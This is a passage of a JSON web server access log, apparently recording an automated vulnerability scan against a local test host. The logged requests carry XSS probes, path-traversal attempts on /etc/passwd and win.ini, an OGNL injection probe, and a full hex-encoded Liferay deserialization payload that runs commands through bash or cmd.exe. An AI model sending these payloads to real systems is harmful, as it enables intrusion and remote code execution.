HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 